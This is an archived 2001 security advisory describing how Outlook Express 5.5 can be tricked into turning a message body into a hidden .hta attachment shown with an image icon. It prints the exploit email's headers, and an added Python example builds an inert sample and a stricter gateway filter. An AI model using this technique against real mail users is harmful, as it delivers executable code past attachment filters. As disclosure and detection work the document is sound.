Subject: [NT] HTML.dropper vulnerability allows creation of emails that contain hidden attachments
Date: Tue, 23 Jan 2001 14:38:12 +0100
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
HTML.dropper vulnerability allows creation of emails that contain hidden attachments
------------------------------------------------------------------------
SUMMARY
Internet Explorer 5.5 and the accompanying mail and news client (Outlook
Express 5.5) let an attacker dictate which icon and which file extension the
client shows for an attachment. Specifically, an attacker can manufacture an
email message that appears to be one thing when in fact it is another.
When the Subject field of a message contains a carefully chosen number of
characters, Outlook Express 5.5, for reasons that are not understood, turns the
text in the body of the message into an attachment. This allows an attacker to
create emails that carry an attachment (when opened under Outlook Express) but
contain no attachment headers (that is, no MIME headers indicating that an
attachment is present).
DETAILS
Vulnerable systems:
Internet Explorer 5.5 with Outlook Express 5.5
Exploit:
Create the following email (a file with an .eml extension that contains the
following):
(NOTE: The spaces in the Subject line have been wrapped here; they should be on
one long line, ending with .hta)
----
MIME-Version: 1.0
To: http-equiv@excite.com
Subject:
.hta
Content-Type: image/gif; charset=us-ascii
Content-Transfer-Encoding: 7bit
----
The exploit creates an email message with no reference to an attachment in its
headers. This is particularly troublesome for content-filtering gateways and
security applications that strip attachments based on header information, for
example a "Content-Disposition: attachment" header, a Content-Type such as
"application/malware", or a "filename=iloveyou.vbs" parameter.
What the above does is create an attachment, in this case an *.hta file, which
is given an image file icon because of the manipulated Content-Type. We then
place in the body of the message the very simple code that executes whatever we
wish, and that body is automatically incorporated into the manufactured
attachment.
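The following is an added example, not part of the advisory or of the
original poster's message. It constructs a message shaped like the one above
(the subject padding length, the inert HTA-style body, and the recipient are
placeholders; the advisory does not give the exact subject length that Outlook
Express 5.5 needs) and runs two gateway checks over it: the naive
Content-Disposition/filename check that the advisory says is bypassed, and a
stricter check that also looks at the Subject extension and at the mismatch
between the declared image/gif Content-Type and a 7bit text body. A second,
constructed message with a properly declared base64 GIF attachment shows that
the stricter check does not flag ordinary mail.

```python
from email import message_from_string

# Extensions Windows executes directly. Illustrative list, an assumption of
# this example rather than something the advisory states.
EXECUTABLE_EXTS = (".hta", ".vbs", ".js", ".exe", ".scr", ".pif", ".bat", ".cmd")


def build_sample(pad_len: int = 120) -> str:
    """Constructed message in the shape of the advisory's .eml.

    The Subject is a run of spaces followed by '.hta'. The advisory says the
    exact length matters; pad_len here is a placeholder, not the real value.
    The body is an inert HTA-style snippet constructed for this example.
    """
    subject = " " * pad_len + ".hta"
    body = "<html><body><script>alert('constructed sample')</script></body></html>\r\n"
    return (
        "MIME-Version: 1.0\r\n"
        "To: http-equiv@excite.com\r\n"
        f"Subject: {subject}\r\n"
        "Content-Type: image/gif; charset=us-ascii\r\n"
        "Content-Transfer-Encoding: 7bit\r\n"
        "\r\n" + body
    )


def build_declared_attachment() -> str:
    """Constructed message that declares its attachment in the headers, the
    case a header-based filter does handle. 'R0lGODlh' is base64 for 'GIF89a'."""
    return (
        "MIME-Version: 1.0\r\n"
        "Subject: photo\r\n"
        'Content-Type: multipart/mixed; boundary="b1"\r\n'
        "\r\n--b1\r\n"
        "Content-Type: text/plain\r\n"
        "\r\nsee attached\r\n"
        "--b1\r\n"
        "Content-Type: image/gif\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        'Content-Disposition: attachment; filename="photo.gif"\r\n'
        "\r\nR0lGODlh\r\n"
        "--b1--\r\n"
    )


def naive_attachment_filter(raw: str) -> bool:
    """Header-only check of the kind the advisory says is bypassed: reports an
    attachment only if some part has Content-Disposition: attachment or a
    filename parameter."""
    msg = message_from_string(raw)
    for part in msg.walk():
        disp = (part.get("Content-Disposition") or "").lower()
        if disp.startswith("attachment") or part.get_filename():
            return True
    return False


def strict_attachment_filter(raw: str) -> list:
    """Returns a list of finding tags; empty means nothing suspicious."""
    msg = message_from_string(raw)
    findings = []
    # The parser strips the leading run of spaces, leaving '.hta'.
    subject = (msg.get("Subject") or "").strip().lower()
    if subject.endswith(EXECUTABLE_EXTS):
        findings.append("subject-executable-ext")
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        cte = (part.get("Content-Transfer-Encoding") or "7bit").lower()
        payload = part.get_payload(decode=True) or b""
        if ctype.startswith("image/") and part.get_param("charset") is not None:
            findings.append("image-with-charset")      # images carry no charset
        if ctype.startswith("image/") and cte in ("7bit", "8bit", "binary"):
            findings.append("image-not-base64")        # real images are base64
        if ctype == "image/gif" and not payload.startswith(b"GIF8"):
            findings.append("gif-magic-missing")       # body is not a GIF at all
    return findings


if __name__ == "__main__":
    for name, raw in (("dropper", build_sample()), ("declared", build_declared_attachment())):
        print(name, "naive:", naive_attachment_filter(raw), "strict:", strict_attachment_filter(raw))
```

The stricter check does not depend on knowing the magic subject length: any message whose declared type cannot be reconciled with its body, or whose Subject ends in an executable extension, is worth quarantining regardless of which client renders it.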
Notes:
1. The security warning still appears when the file is opened. However, the
icon, which reflects the declared content type, is likely to override most if
not all users' concern.
2. The actual file extension (*.hta in this case) seems to have to appear in
the security warning dialog; it can be seen at the very end of the file name
offered for execution. If the subject is too long, Outlook Express instead
creates an odd *.txt file and prompts with something like 'what do you want to
open this with'.
3. This appears to be somewhat similar to an issue examined several months
ago:
Force Feeding files to Internet Explorer
ADDITIONAL INFORMATION
The information has been provided by caretaker of malware.
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.